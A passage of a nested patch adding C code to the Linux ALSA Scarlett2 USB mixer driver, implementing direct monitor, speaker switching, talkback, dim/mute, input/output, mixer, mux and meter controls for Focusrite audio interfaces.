++			mixer, SCARLETT2_CONFIG_DIRECT_MONITOR,
++			1, &private->direct_monitor_switch);
++
++	/* if the device doesn't do speaker switching then it also
++	 * doesn't do talkback
++	 */
++	if (!info->has_speaker_switching)
++		return 0;
++
++	err = scarlett2_usb_get_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
++		2, monitor_other_enable);
++	if (err < 0)
++		return err;
++
++	err = scarlett2_usb_get_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
++		2, monitor_other_switch);
++	if (err < 0)
++		return err;
++
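++	/* encode as 0=Off, 1=Main, 2=Alt to match the ctl enum */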
++	if (!monitor_other_enable[0])
++		private->speaker_switching_switch = 0;
++	else
++		private->speaker_switching_switch = monitor_other_switch[0] + 1;
++
++	if (info->has_talkback) {
++		const int (*port_count)[SCARLETT2_PORT_DIRNS] =
++			info->port_count;
++		int num_mixes =
++			port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
++		u16 bitmap;
++		int i;
++
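++		/* encode as 0=Disabled, 1=Off, 2=On to match the
++		 * ctl enum
++		 */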
++		if (!monitor_other_enable[1])
++			private->talkback_switch = 0;
++		else
++			private->talkback_switch = monitor_other_switch[1] + 1;
++
++		err = scarlett2_usb_get_config(mixer,
++					       SCARLETT2_CONFIG_TALKBACK_MAP,
++					       1, &bitmap);
++		if (err < 0)
++			return err;
++		for (i = 0; i < num_mixes; i++, bitmap >>= 1)
++			private->talkback_map[i] = bitmap & 1;
++	}
++
++	return 0;
++}
++
++static int scarlett2_direct_monitor_ctl_get(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->direct_monitor_switch;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_direct_monitor_ctl_put(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int index = elem->control;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->direct_monitor_switch;
++	val = min(ucontrol->value.enumerated.item[0], 2U);
++
++	if (oval == val)
++		goto unlock;
++
++	private->direct_monitor_switch = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_DIRECT_MONITOR, index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_direct_monitor_stereo_enum_ctl_info(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
++{
++	static const char *const values[3] = {
++		"Off", "Mono", "Stereo"
++	};
++
++	return snd_ctl_enum_info(uinfo, 1, 3, values);
++}
++
++/* Direct Monitor on the Solo is mono-only and only needs a boolean
++ * control; Direct Monitor on the 2i2 is selectable between
++ * Off/Mono/Stereo
++ */
++static const struct snd_kcontrol_new scarlett2_direct_monitor_ctl[2] = {
++	{
++		.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++		.name = "",
++		.info = snd_ctl_boolean_mono_info,
++		.get  = scarlett2_direct_monitor_ctl_get,
++		.put  = scarlett2_direct_monitor_ctl_put,
++	},
++	{
++		.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++		.name = "",
++		.info = scarlett2_direct_monitor_stereo_enum_ctl_info,
++		.get  = scarlett2_direct_monitor_ctl_get,
++		.put  = scarlett2_direct_monitor_ctl_put,
++	}
++};
++
++static int scarlett2_add_direct_monitor_ctl(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const char *s;
++
++	if (!info->direct_monitor)
++		return 0;
++
++	s = info->direct_monitor == 1
++	      ? "Direct Monitor Playback Switch"
++	      : "Direct Monitor Playback Enum";
++
++	return scarlett2_add_new_ctl(
++		mixer, &scarlett2_direct_monitor_ctl[info->direct_monitor - 1],
++		0, 1, s, &private->direct_monitor_ctl);
++}
++
++/*** Speaker Switching Control ***/
++
++static int scarlett2_speaker_switch_enum_ctl_info(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
++{
++	static const char *const values[3] = {
++		"Off", "Main", "Alt"
++	};
++
++	return snd_ctl_enum_info(uinfo, 1, 3, values);
++}
++
++static int scarlett2_speaker_switch_enum_ctl_get(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->speaker_switching_switch;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++/* when speaker switching gets enabled, switch the main/alt speakers
++ * to HW volume and make their SW/HW switch controls read-only
++ */
++static int scarlett2_speaker_switch_enable(struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	int i, err;
++
++	for (i = 0; i < 4; i++) {
++		int index = line_out_remap(private, i);
++
++		/* switch the main/alt speakers to HW volume */
++		if (!private->vol_sw_hw_switch[index]) {
++			err = scarlett2_sw_hw_change(private->mixer, i, 1);
++			if (err < 0)
++				return err;
++		}
++
++		/* disable the line out SW/HW switch */
++		scarlett2_sw_hw_ctl_ro(private, i);
++		snd_ctl_notify(card,
++			       SNDRV_CTL_EVENT_MASK_VALUE |
++				 SNDRV_CTL_EVENT_MASK_INFO,
++			       &private->sw_hw_ctls[i]->id);
++	}
++
++	/* when the next monitor-other notify comes in, update the mux
++	 * configuration
++	 */
++	private->speaker_switching_switched = 1;
++
++	return 0;
++}
++
++/* when speaker switching gets disabled, re-enable the HW/SW controls
++ * and invalidate the routing
++ */
++static void scarlett2_speaker_switch_disable(struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	int i;
++
++	/* enable the line out SW/HW switch */
++	for (i = 0; i < 4; i++) {
++		scarlett2_sw_hw_ctl_rw(private, i);
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_INFO,
++			       &private->sw_hw_ctls[i]->id);
++	}
++
++	/* when the next monitor-other notify comes in, update the mux
++	 * configuration
++	 */
++	private->speaker_switching_switched = 1;
++}
++
++static int scarlett2_speaker_switch_enum_ctl_put(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->speaker_switching_switch;
++	val = min(ucontrol->value.enumerated.item[0], 2U);
++
++	if (oval == val)
++		goto unlock;
++
++	private->speaker_switching_switch = val;
++
++	/* enable/disable speaker switching */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
++		0, !!val);
++	if (err < 0)
++		goto unlock;
++
++	/* if speaker switching is enabled, select main or alt */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
++		0, val == 2);
++	if (err < 0)
++		goto unlock;
++
++	/* update controls if speaker switching gets enabled or disabled */
++	if (!oval && val)
++		err = scarlett2_speaker_switch_enable(mixer);
++	else if (oval && !val)
++		scarlett2_speaker_switch_disable(mixer);
++
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_speaker_switch_enum_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = scarlett2_speaker_switch_enum_ctl_info,
++	.get  = scarlett2_speaker_switch_enum_ctl_get,
++	.put  = scarlett2_speaker_switch_enum_ctl_put,
++};
++
++static int scarlett2_add_speaker_switch_ctl(
++	struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	if (!info->has_speaker_switching)
++		return 0;
++
++	return scarlett2_add_new_ctl(
++		mixer, &scarlett2_speaker_switch_enum_ctl,
++		0, 1, "Speaker Switching Playback Enum",
++		&private->speaker_switching_ctl);
++}
++
++/*** Talkback and Talkback Map Controls ***/
++
++static int scarlett2_talkback_enum_ctl_info(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
++{
++	static const char *const values[3] = {
++		"Disabled", "Off", "On"
++	};
++
++	return snd_ctl_enum_info(uinfo, 1, 3, values);
++}
++
++static int scarlett2_talkback_enum_ctl_get(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->talkback_switch;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_talkback_enum_ctl_put(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->talkback_switch;
++	val = min(ucontrol->value.enumerated.item[0], 2U);
++
++	if (oval == val)
++		goto unlock;
++
++	private->talkback_switch = val;
++
++	/* enable/disable talkback */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
++		1, !!val);
++	if (err < 0)
++		goto unlock;
++
++	/* if talkback is enabled, select main or alt */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
++		1, val == 2);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_talkback_enum_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = scarlett2_talkback_enum_ctl_info,
++	.get  = scarlett2_talkback_enum_ctl_get,
++	.put  = scarlett2_talkback_enum_ctl_put,
++};
++
++static int scarlett2_talkback_map_ctl_get(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = elem->control;
++
++	ucontrol->value.integer.value[0] = private->talkback_map[index];
++
++	return 0;
++}
++
++static int scarlett2_talkback_map_ctl_put(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] =
++		private->info->port_count;
++	int num_mixes = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
++
++	int index = elem->control;
++	int oval, val, err = 0, i;
++	u16 bitmap = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->talkback_map[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->talkback_map[index] = val;
++
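++	/* rebuild the full bitmap: bit i enables talkback to mix i */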
++	for (i = 0; i < num_mixes; i++)
++		bitmap |= private->talkback_map[i] << i;
++
++	/* Send updated bitmap to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_TALKBACK_MAP,
++				       0, bitmap);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_talkback_map_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_talkback_map_ctl_get,
++	.put  = scarlett2_talkback_map_ctl_put,
++};
++
++static int scarlett2_add_talkback_ctls(
++	struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_mixes = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
++	int err, i;
++	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
++
++	if (!info->has_talkback)
++		return 0;
++
++	err = scarlett2_add_new_ctl(
++		mixer, &scarlett2_talkback_enum_ctl,
++		0, 1, "Talkback Playback Enum",
++		&private->talkback_ctl);
++	if (err < 0)
++		return err;
++
++	for (i = 0; i < num_mixes; i++) {
++		snprintf(s, sizeof(s),
++			 "Talkback Mix %c Playback Switch", i + 'A');
++		err = scarlett2_add_new_ctl(mixer, &scarlett2_talkback_map_ctl,
++					    i, 1, s, NULL);
++		if (err < 0)
++			return err;
++	}
++
++	return 0;
++}
++
++/*** Dim/Mute Controls ***/
++
++static int scarlett2_dim_mute_ctl_get(struct snd_kcontrol *kctl,
++				      struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] = private->dim_mute[elem->control];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_dim_mute_ctl_put(struct snd_kcontrol *kctl,
++				      struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++
++	int index = elem->control;
++	int oval, val, err = 0, i;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->dim_mute[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->dim_mute[index] = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_DIM_MUTE,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
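++	/* a mute button change also applies to every line out that
++	 * follows the HW volume/mute (vol_sw_hw_switch set)
++	 */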
++	if (index == SCARLETT2_BUTTON_MUTE)
++		for (i = 0; i < num_line_out; i++) {
++			int line_index = line_out_remap(private, i);
++
++			if (private->vol_sw_hw_switch[line_index]) {
++				private->mute_switch[line_index] = val;
++				snd_ctl_notify(mixer->chip->card,
++					       SNDRV_CTL_EVENT_MASK_VALUE,
++					       &private->mute_ctls[i]->id);
++			}
++		}
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_dim_mute_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_dim_mute_ctl_get,
++	.put  = scarlett2_dim_mute_ctl_put
++};
++
++/*** Create the analogue output controls ***/
++
++static int scarlett2_add_line_out_ctls(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++	int err, i;
++	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
++
++	/* Add R/O HW volume control */
++	if (info->line_out_hw_vol) {
++		snprintf(s, sizeof(s), "Master HW Playback Volume");
++		err = scarlett2_add_new_ctl(mixer,
++					    &scarlett2_master_volume_ctl,
++					    0, 1, s, &private->master_vol_ctl);
++		if (err < 0)
++			return err;
++	}
++
++	/* Add volume controls */
++	for (i = 0; i < num_line_out; i++) {
++		int index = line_out_remap(private, i);
++
++		/* Fader */
++		if (info->line_out_descrs[i])
++			snprintf(s, sizeof(s),
++				 "Line %02d (%s) Playback Volume",
++				 i + 1, info->line_out_descrs[i]);
++		else
++			snprintf(s, sizeof(s),
++				 "Line %02d Playback Volume",
++				 i + 1);
++		err = scarlett2_add_new_ctl(mixer,
++					    &scarlett2_line_out_volume_ctl,
++					    i, 1, s, &private->vol_ctls[i]);
++		if (err < 0)
++			return err;
++
++		/* Mute Switch */
++		snprintf(s, sizeof(s),
++			 "Line %02d Mute Playback Switch",
++			 i + 1);
++		err = scarlett2_add_new_ctl(mixer,
++					    &scarlett2_mute_ctl,
++					    i, 1, s,
++					    &private->mute_ctls[i]);
++		if (err < 0)
++			return err;
++
++		/* Make the fader and mute controls read-only if the
++		 * SW/HW switch is set to HW
++		 */
++		if (private->vol_sw_hw_switch[index])
++			scarlett2_vol_ctl_set_writable(mixer, i, 0);
++
++		/* SW/HW Switch */
++		if (info->line_out_hw_vol) {
++			snprintf(s, sizeof(s),
++				 "Line Out %02d Volume Control Playback Enum",
++				 i + 1);
++			err = scarlett2_add_new_ctl(mixer,
++						    &scarlett2_sw_hw_enum_ctl,
++						    i, 1, s,
++						    &private->sw_hw_ctls[i]);
++			if (err < 0)
++				return err;
++
++			/* Make the switch read-only if the line is
++			 * involved in speaker switching
++			 */
++			if (private->speaker_switching_switch && i < 4)
++				scarlett2_sw_hw_ctl_ro(private, i);
++		}
++	}
++
++	/* Add dim/mute controls */
++	if (info->line_out_hw_vol)
++		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++) {
++			err = scarlett2_add_new_ctl(
++				mixer, &scarlett2_dim_mute_ctl,
++				i, 1, scarlett2_dim_mute_names[i],
++				&private->dim_mute_ctls[i]);
++			if (err < 0)
++				return err;
++		}
++
++	return 0;
++}
++
++/*** Create the analogue input controls ***/
++
++static int scarlett2_add_line_in_ctls(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	int err, i;
++	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
++	const char *fmt = "Line In %d %s Capture %s";
++	const char *fmt2 = "Line In %d-%d %s Capture %s";
++
++	/* Add input level (line/inst) controls */
++	for (i = 0; i < info->level_input_count; i++) {
++		snprintf(s, sizeof(s), fmt, i + 1 + info->level_input_first,
++			 "Level", "Enum");
++		err = scarlett2_add_new_ctl(mixer, &scarlett2_level_enum_ctl,
++					    i, 1, s, &private->level_ctls[i]);
++		if (err < 0)
++			return err;
++	}
++
++	/* Add input pad controls */
++	for (i = 0; i < info->pad_input_count; i++) {
++		snprintf(s, sizeof(s), fmt, i + 1, "Pad", "Switch");
++		err = scarlett2_add_new_ctl(mixer, &scarlett2_pad_ctl,
++					    i, 1, s, &private->pad_ctls[i]);
++		if (err < 0)
++			return err;
++	}
++
++	/* Add input air controls */
++	for (i = 0; i < info->air_input_count; i++) {
++		snprintf(s, sizeof(s), fmt, i + 1, "Air", "Switch");
++		err = scarlett2_add_new_ctl(mixer, &scarlett2_air_ctl,
++					    i, 1, s, &private->air_ctls[i]);
++		if (err < 0)
++			return err;
++	}
++
++	/* Add input phantom controls */
++	if (info->inputs_per_phantom == 1) {
++		for (i = 0; i < info->phantom_count; i++) {
++			snprintf(s, sizeof(s), fmt, i + 1,
++				 "Phantom Power", "Switch");
++			err = scarlett2_add_new_ctl(
++				mixer, &scarlett2_phantom_ctl,
++				i, 1, s, &private->phantom_ctls[i]);
++			if (err < 0)
++				return err;
++		}
++	} else if (info->inputs_per_phantom > 1) {
++		for (i = 0; i < info->phantom_count; i++) {
++			int from = i * info->inputs_per_phantom + 1;
++			int to = (i + 1) * info->inputs_per_phantom;
++
++			snprintf(s, sizeof(s), fmt2, from, to,
++				 "Phantom Power", "Switch");
++			err = scarlett2_add_new_ctl(
++				mixer, &scarlett2_phantom_ctl,
++				i, 1, s, &private->phantom_ctls[i]);
++			if (err < 0)
++				return err;
++		}
++	}
++	if (info->phantom_count) {
++		err = scarlett2_add_new_ctl(
++			mixer, &scarlett2_phantom_persistence_ctl, 0, 1,
++			"Phantom Power Persistence Capture Switch", NULL);
++		if (err < 0)
++			return err;
++	}
++
++	return 0;
++}
++
++/*** Mixer Volume Controls ***/
++
++static int scarlett2_mixer_ctl_info(struct snd_kcontrol *kctl,
++				    struct snd_ctl_elem_info *uinfo)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++
++	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
++	uinfo->count = elem->channels;
++	uinfo->value.integer.min = 0;
++	uinfo->value.integer.max = SCARLETT2_MIXER_MAX_VALUE;
++	uinfo->value.integer.step = 1;
++	return 0;
++}
++
++static int scarlett2_mixer_ctl_get(struct snd_kcontrol *kctl,
++				   struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++
++	ucontrol->value.integer.value[0] = private->mix[elem->control];
++	return 0;
++}
++
++static int scarlett2_mixer_ctl_put(struct snd_kcontrol *kctl,
++				   struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int oval, val, num_mixer_in, mix_num, err = 0;
++	int index = elem->control;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->mix[index];
++	val = clamp(ucontrol->value.integer.value[0],
++		    0L, (long)SCARLETT2_MIXER_MAX_VALUE);
++	num_mixer_in = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
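++	/* mixer controls are registered with inputs varying fastest,
++	 * so index / num_mixer_in recovers the mix number
++	 */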
++	mix_num = index / num_mixer_in;
++
++	if (oval == val)
++		goto unlock;
++
++	private->mix[index] = val;
++	err = scarlett2_usb_set_mix(mixer, mix_num);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const DECLARE_TLV_DB_MINMAX(
++	db_scale_scarlett2_mixer,
++	SCARLETT2_MIXER_MIN_DB * 100,
++	SCARLETT2_MIXER_MAX_DB * 100
++);
++
++static const struct snd_kcontrol_new scarlett2_mixer_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.access = SNDRV_CTL_ELEM_ACCESS_READWRITE |
++		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
++	.name = "",
++	.info = scarlett2_mixer_ctl_info,
++	.get  = scarlett2_mixer_ctl_get,
++	.put  = scarlett2_mixer_ctl_put,
++	.private_value = SCARLETT2_MIXER_MAX_DB, /* max value */
++	.tlv = { .p = db_scale_scarlett2_mixer }
++};
++
++static int scarlett2_add_mixer_ctls(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int err, i, j;
++	int index;
++	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
++
++	int num_inputs =
++		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
++	int num_outputs =
++		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
++
++	for (i = 0, index = 0; i < num_outputs; i++)
++		for (j = 0; j < num_inputs; j++, index++) {
++			snprintf(s, sizeof(s),
++				 "Mix %c Input %02d Playback Volume",
++				 'A' + i, j + 1);
++			err = scarlett2_add_new_ctl(mixer, &scarlett2_mixer_ctl,
++						    index, 1, s, NULL);
++			if (err < 0)
++				return err;
++		}
++
++	return 0;
++}
++
++/*** Mux Source Selection Controls ***/
++
++static int scarlett2_mux_src_enum_ctl_info(struct snd_kcontrol *kctl,
++					   struct snd_ctl_elem_info *uinfo)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	unsigned int item = uinfo->value.enumerated.item;
++	int items = private->num_mux_srcs;
++	int port_type;
++
++	uinfo->type = SNDRV_CTL_ELEM_TYPE_ENUMERATED;
++	uinfo->count = elem->channels;
++	uinfo->value.enumerated.items = items;
++
++	if (item >= items)
++		item = uinfo->value.enumerated.item = items - 1;
++
++	for (port_type = 0;
++	     port_type < SCARLETT2_PORT_TYPE_COUNT;
++	     port_type++) {
++		if (item < port_count[port_type][SCARLETT2_PORT_IN]) {
++			const struct scarlett2_port *port =
++				&scarlett2_ports[port_type];
++
++			sprintf(uinfo->value.enumerated.name,
++				port->src_descr, item + port->src_num_offset);
++			return 0;
++		}
++		item -= port_count[port_type][SCARLETT2_PORT_IN];
++	}
++
++	return -EINVAL;
++}
++
++static int scarlett2_mux_src_enum_ctl_get(struct snd_kcontrol *kctl,
++					  struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->mux_updated) {
++		err = scarlett2_usb_get_mux(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->mux[index];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_mux_src_enum_ctl_put(struct snd_kcontrol *kctl,
++					  struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->mux[index];
++	val = min(ucontrol->value.enumerated.item[0],
++		  private->num_mux_srcs - 1U);
++
++	if (oval == val)
++		goto unlock;
++
++	private->mux[index] = val;
++	err = scarlett2_usb_set_mux(mixer);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_mux_src_enum_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = scarlett2_mux_src_enum_ctl_info,
++	.get  = scarlett2_mux_src_enum_ctl_get,
++	.put  = scarlett2_mux_src_enum_ctl_put,
++};
++
++static int scarlett2_add_mux_enums(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int port_type, channel, i;
++
++	for (i = 0, port_type = 0;
++	     port_type < SCARLETT2_PORT_TYPE_COUNT;
++	     port_type++) {
++		for (channel = 0;
++		     channel < port_count[port_type][SCARLETT2_PORT_OUT];
++		     channel++, i++) {
++			int err;
++			char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
++			const char *const descr =
++				scarlett2_ports[port_type].dst_descr;
++
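++			/* leave room in s for the " Enum" suffix */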
++			snprintf(s, sizeof(s) - 5, descr, channel + 1);
++			strcat(s, " Enum");
++
++			err = scarlett2_add_new_ctl(mixer,
++						    &scarlett2_mux_src_enum_ctl,
++						    i, 1, s,
++						    &private->mux_ctls[i]);
++			if (err < 0)
++				return err;
++		}
++	}
++
++	return 0;
++}
++
++/*** Meter Controls ***/
++
++static int scarlett2_meter_ctl_info(struct snd_kcontrol *kctl,
++				    struct snd_ctl_elem_info *uinfo)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++
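++	/* raw meter levels are 12-bit values (0..4095) */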
++	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
++	uinfo->count = elem->channels;
++	uinfo->value.integer.min = 0;
++	uinfo->value.integer.max = 4095;
++	uinfo->value.integer.step = 1;
++	return 0;
++}
++
